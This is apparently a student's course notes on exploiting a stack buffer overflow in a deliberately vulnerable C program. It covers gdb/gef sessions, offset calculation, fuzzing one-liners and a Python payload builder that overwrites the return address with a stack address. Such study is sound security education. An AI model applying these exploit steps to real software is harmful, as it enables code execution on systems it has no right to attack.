BUFFER OVERFLOWS
identifying whether a vulnerability exists in a program and exploiting that vulnerability
VULNERABLE C FUNCTIONS
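these functions perform no bounds checking. they keep reading or writing data until a terminator is reached (a null byte for the string functions, a newline or whitespace for the input functions), regardless of the size of the destination buffer
strcpy(), strcat(), sprintf(), vsprintf(), gets(), scanf()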
SECURE C FUNCTIONS (ALTERNATIVES)
strncpy(), strncat(), snprintf(), fgets()
SAMPLE VULNERABLE PROGRAM FLOW
#include <stdio.h>

//function prototype
void vulnFunc(void);

int main()
{
    //greet our Trojan friends
    printf("Hello, DSU!\n");
    //do something interesting
    vulnFunc();
    //close
    return 0;
}

//function implementation
void vulnFunc(void){
    //local variables
    int a = 1;
    int b = 20;
    int c = 123;
    char buffer [8];
    //get user input, print it
    gets(buffer); //gets() pays no attention to the 8-byte size of buffer
    //gets() does not know or care about how
    //big buffer is. It reads characters until
    //it sees a newline (\n) or EOF, and then
    //adds a null terminator (\0), even if
    //the input is longer than the buffer. This
    //causes a buffer overflow, which can
    //corrupt memory, crash programs, or be
    //exploited for code execution (classic vuln)
    printf("%s\n", buffer);
    return;
}
SIMPLE BUFFER OVERFLOW PROGRAM
//gcc -g -fno-stack-protector -z execstack 27_stack_overflow.c -o 27_stack_overflow.out
//gcc -g -m32 -fno-stack-protector -z execstack 27_stack_overflow.c -o 27_stack_overflow.out
#include <stdio.h>
#include <stdlib.h>

void echo(void){
    printf("Enter some text:\n");
    char buffer[16]; //16 byte buffer stored on the stack
    gets(buffer); //retrieve user input and store in the buffer
    printf("%s\n", buffer); //print out the user input as string
    return;
}

void main(void)
{
    echo();
    exit(0);
}
* the -g will add debugging symbols to the binary to make it easier to analyze
* the -m32 will compile for 32-bit architecture, even on a 64-bit system.
- this is important because stack overflows behave differently in 32-bit vs
64-bit.
- this requires gcc-multilib package installed on some systems.
* the -fno-stack-protector disables stack canaries (a security feature).
- normally, stack canaries help detect and prevent buffer overflows.
- this flag removes that protection, making the binary vulnerable to stack
overflow exploits.
* the -z execstack marks the stack as executable.
- by default, modern systems mark the stack as non-executable (NX bit) to
prevent shellcode from running.
- this flag disables that protection, allowing shellcode to be executed from the
stack.
root@dev:~$ ./27_stack_overflow.out
Enter some text:
AAAABBBBCCCCDDDD
* expected 16 character input, which fills the buffer exactly
- the program still runs normally: only the terminating null byte lands past the buffer, and nothing critically important is overwritten
root@dev:~$ ./27_stack_overflow.out
Enter some text:
AAAABBBBCCCCDDDDE
* unexpected 17 character input, one more than the 16-byte buffer holds
- the program still runs normally: the overflow is small and nothing critically important is overwritten
root@dev:~$ ./27_stack_overflow.out
Enter some text:
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII
Segmentation fault (core dumped)
* 36 character input, far beyond the 16-byte buffer
- the segmentation fault shows that data the program depends on has been overwritten
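To see why 16 and 17 characters pass quietly while 36 crash, the writes made by gets() can be modelled against the frame layout recorded in the stack table later in these notes (buffer at EBP-0x18, return address at EBP+4). This is a minimal Python sketch of that bookkeeping, not a trace of the real binary; the FRAME list and the helper names are illustrative assumptions.

```python
# Frame layout as byte offsets from the start of buffer, taken from the
# EBP-relative table in these notes. FRAME and the helpers are hypothetical names.
FRAME = [
    (0, 16, "buffer[16] (EBP-0x18)"),
    (16, 20, "EBP-0x8"),
    (20, 24, "EBP-0x4"),
    (24, 28, "saved EBP"),
    (28, 32, "return address (EBP+4)"),
]


def bytes_written(n_chars):
    """gets() stores every character typed plus one terminating null byte."""
    return n_chars + 1


def touched_slots(n_chars):
    """Return the names of the frame slots that receive at least one byte."""
    end = bytes_written(n_chars)
    return [name for start, _stop, name in FRAME if start < end]


for n in (16, 17, 36):
    print(n, "chars ->", touched_slots(n))
```

With 16 or 17 characters only the buffer and the slot directly above it are touched; with 36 characters every slot up to and including the return address is overwritten.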
EXPLOITATION
STEP 1: CODE REVIEW (IF SOURCES ARE AVAILABLE)
STEP 2: DEBUGGING (IF SOURCES AREN'T AVAILABLE)
this method requires determining how many characters will break the program
root@dev:~$ gdb ./27_stack_overflow.out
...
#step 1: identify function locations & vulnerable functions
gef> info func
All defined functions
File 27_stack_overflow.c:
7: void echo(void)
17: void main(void)
Non-debugging symbols
...
0x00001000 _init
0x00001030 gets@plt //gets is a vulnerable function
...
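* the @plt suffix marks a Procedure Linkage Table stub, meaning gets() is resolved through dynamic linking
- the PLT/GOT matters later when working out how many characters can be entered before the program crashes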
#step 2: place breakpoint
gef> b *echo
breakpoint 1 at 0x11b9: file 27_stack_overflow.c, line 8
#step 3: run the program until the breakpoint is hit
gef> r
...
* r runs the program until a breakpoint is hit
#step 4: disassemble & identify important function calls
gef> d
...
0x565561d5 <+28>: call 0x56556040 <puts@plt>
...
0x565561e0 <+39>: lea eax, [ebp-0x18]
0x565561e3 <+42>: push eax
//working backwards from gets@plt, I see "push eax" and above it "lea eax,[ebp-0x18]"
//without looking at the source, this could be where the value entered by the user will be stored
//if this is an array, then this will be the address of the 1st element
0x565561e4 <+43>: call 0x56556030 <gets@plt> //this is a vulnerable function
...
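* d disassembles the function where the breakpoint was hit (this assumes d is aliased to disassemble in this setup; stock gdb abbreviates disassemble as disas)
- this will display the important calls being made by the function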
#step 5: set breakpoint at where the user input is stored
gef> b *0x565561e3
gef> r
gef> d
gef> c
0x565561e0 <+39>: lea eax, [ebp-0x18]
*-> 0x565561e3 <+42>: push eax
#step 6: fill in the important values to reduce guess work
root@dev:~$ cd ../resources
root@dev:~$ xdg-open bof-calc.xlsx
...
OFFSET    ADDRESS   ESP(X)  VALUE  DESCRIPTION
EBP+4     FFFFD12C                 Return Address
EBP       FFFFD128
...
EBP-0x18  FFFFD110                 Buffer[16]
EBP-0x24  FFFFD104  X              Take note of the ESP as this is where I'd like to overwrite with shellcode
* these entries can be gathered from the step 5 disassembly
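The ADDRESS column is plain arithmetic on the EBP value read from the debugger. A minimal Python sketch of that calculation follows; it is not the bof-calc.xlsx spreadsheet itself, the EBP value is the one shown in these notes, and the function and variable names are hypothetical.

```python
def frame_address(ebp, offset):
    """Address of an EBP-relative slot, wrapped to 32 bits."""
    return (ebp + offset) & 0xFFFFFFFF


# Offsets taken from the disassembly and table above; ROWS is an illustrative name.
ROWS = [("EBP+4", 4), ("EBP", 0), ("EBP-0x18", -0x18), ("EBP-0x24", -0x24)]


def address_table(ebp):
    """Return (label, address) pairs formatted like the spreadsheet rows."""
    return [(label, "%08X" % frame_address(ebp, off)) for label, off in ROWS]


for label, addr in address_table(0xFFFFD128):
    print(label.ljust(10), addr)
```

Stack addresses usually differ between a gdb session and a normal run, so the EBP value has to be read again in whichever environment the exploit will run.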
gef> c
Continuing
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII
Program received signal SIGSEGV, Segmentation fault.
0x48484848 in ?? ()
Register Section...
$EAX : 0x25
$EBX : 0x46464646 ("FFFF"?)
...
$ESP : 0xFFFFD130 -> "IIII"
$EBP : 0x47474747 ("GGGG"?)
...
$EIP : 0x48484848 ("HHHH"?)
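The register values can be mapped back to positions in the input instead of being counted by hand. A minimal Python sketch, assuming a little-endian 32-bit target and the same AAAABBBB... pattern that was typed in; the helper names are hypothetical.

```python
import struct

PATTERN = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII"


def register_bytes(value):
    """Bytes as they sat in memory for a 32-bit little-endian register value."""
    return struct.pack("<I", value)


def offset_in_pattern(value, pattern=PATTERN):
    """Index in the input where the register's bytes came from, or -1 if absent."""
    return pattern.find(register_bytes(value))


print("EIP offset:", offset_in_pattern(0x48484848))
print("EBP offset:", offset_in_pattern(0x47474747))
print("EBX offset:", offset_in_pattern(0x46464646))
```

Because every 4-byte group in this pattern repeats one letter, byte order does not change the result here; with a non-repeating pattern the little-endian packing matters.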
root@dev:~$ xdg-open bof-calc.xlsx
...
OFFSET    ADDRESS   ESP(X)  VALUE  DESCRIPTION
EBP+8     FFFFD130          IIII
EBP+4     FFFFD12C          HHHH   Return Address
EBP       FFFFD128          GGGG
EBP-0x4   FFFFD124          FFFF
EBP-0x8   FFFFD120          EEEE
EBP-0xC   FFFFD11C          DDDD
EBP-0x10  FFFFD118          CCCC
EBP-0x14  FFFFD114          BBBB
EBP-0x18  FFFFD110          AAAA   Buffer[16]
EBP-0x24  FFFFD104  X              //this was the previous assumption and can now be ignored
* the bof-calc.xlsx created by DSU Professor Dr. Ham can easily tell you which
memory address to target and how many bytes are required to overwrite the EIP
- in this specific example, 32 bytes are required: 28 bytes of padding to reach
the return address, plus 4 bytes to overwrite it
- counting from AAAA, bytes 29-32 land at location EBP+4 FFFFD12C (HHHH)
- if I overwrite the return address at EBP+4 with the address of my shellcode,
that address will be popped off the stack by ret and given to EIP
to execute
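The 28 + 4 byte layout can be written down as a small payload builder. This is a sketch under stated assumptions, not a finished exploit: the target address 0xFFFFD130 is simply the slot right after the return address as seen in this gdb session, and build_payload is a hypothetical helper name.

```python
import struct

OFFSET_TO_RET = 28  # bytes from the start of buffer to the return address


def build_payload(ret_addr, tail=b""):
    """Padding up to the return address, the new address, then optional bytes."""
    payload = b"A" * OFFSET_TO_RET + struct.pack("<I", ret_addr) + tail
    # gets() stops reading at a newline, so the payload must not contain one.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte (0x0a)")
    return payload


payload = build_payload(0xFFFFD130)
print(len(payload), payload[OFFSET_TO_RET:].hex())
```

To feed it to the program, the bytes plus a trailing newline would be written to the target's stdin, for example through sys.stdout.buffer.write() and a pipe.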
#step 7: set breakpoint after the call to gets
gef> b *echo+48
Breakpoint 3 at 0x565561e9: file 27_stack_overflow.c, line 11
#display all breakpoints
gef> i b
...
#disable breakpoints already analyzed
gef> disable 1
gef> disable 2
gef> c
Continuing
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII
STACK
...
0xffffd100|+0x0000: 0xffffd110 -> "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII" <- $esp
#dump the stack memory at this location to determine where the buffer truly lives
gef> x /8xw 0xffffd110
0xffffd110: 0x41414141 (A's) 0x42424242 (B's) 0x43434343 (C's) 0x44444444 (D's)
0xffffd120: 0x45454545 (E's) 0x46464646 (F's) 0x47474747 (G's) 0x48484848 (H's)
#do a single instruction step
gef> si
gef> si
gef> si
gef> si
gef> d
...
#step over the puts
gef> s
gef> si
gef> si
-> 0x565561ff <echo+70> leave
gef> s or si
gef> s or si
...
Register section
$eip : 0x48484848 ("HHHH"?)
...
Stack section
...
0xffffd130|+0x0000: "IIII" <-$esp
...
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x48484848
gef> c
* segmentation fault reached
#next step: determine exactly how many characters must be entered
#can fewer be entered? find out
#knowing the specific amount of buffer space available is a beneficial skill to have
#when you're trying to develop an exploit/payload for a very small, specific piece of memory
#FUZZ
root@dev:~$ python3 -c "print('A' * 16)" | ./27_stack_overflow.out
Enter some text:
AAAAAAAAAAAAAAAA
root@dev:~$ python3 -c "print('A' * 20)" | ./27_stack_overflow.out
Enter some text:
AAAAAAAAAAAAAAAAAAAA
#since this is an x86 program, fuzz 4 bytes at a time
root@dev:~$ python3 -c "print('A' * 24)" | ./27_stack_overflow.out
Enter some text:
AAAAAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
* it looks like something stored below the saved EBP and the return address (EIP)
is really important to the program, and modifying it causes the program to
crash with "Segmentation fault"
root@dev:~$ python3 -c "print('A' * 21)" | ./27_stack_overflow.out
Enter some text:
AAAAAAAAAAAAAAAAAAAAA
Segmentation fault (core dumped)
* 21 is the magic number: the smallest input at which the program crashes
* gets() reads a line from the stdin stream and stores it in buffer. the line
consists of all characters up to and including the first newline character \n.
gets() then replaces the newline character with a null character \0 before
returning the line
- if you type 20 characters in this sample, gets() actually stores 21 bytes:
the 20 characters plus the null character that replaces the newline
- in the above fuzzing, when the program crashes at 21, 22 bytes are actually
written into memory; the null character is the 22nd
- the REAL reason the program crashes is most likely that bytes 21 and 22 land
in the slot at EBP-0x4, which the earlier crash dump shows being loaded into
EBX ("FFFF"). in 32-bit position-independent code EBX holds the GOT base
address, so calls through the GOT/PLT then use a corrupted pointer
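The manual fuzzing runs above can be automated. The following is a minimal Python sketch, assuming a POSIX system where a process killed by a signal reports a negative return code through subprocess; the binary path is the one used in these notes, and the function names are hypothetical.

```python
import subprocess


def crashes(binary, length):
    """Send `length` 'A' characters plus a newline; True if a signal killed it."""
    data = b"A" * length + b"\n"
    result = subprocess.run(
        [binary],
        input=data,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    # On POSIX a negative return code means termination by a signal (e.g. SIGSEGV).
    return result.returncode < 0


def first_crash_length(probe, start, stop):
    """Smallest length in [start, stop] for which probe(length) is True, else None."""
    for length in range(start, stop + 1):
        if probe(length):
            return length
    return None
```

A call such as first_crash_length(lambda n: crashes("./27_stack_overflow.out", n), 16, 40) would walk the lengths one byte at a time; taking the probe as a parameter keeps the search logic testable without the target binary.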
GOT hooking, in brief: the GOT contains the addresses of the dynamically linked functions the program relies upon. if an adversary can change an address in that lookup table, calls to that function can be pointed at something the adversary controls, or at different functionality.
the GOT & PLT are used in dynamic linking
UNDERSTANDING THE PROGRAM CRASH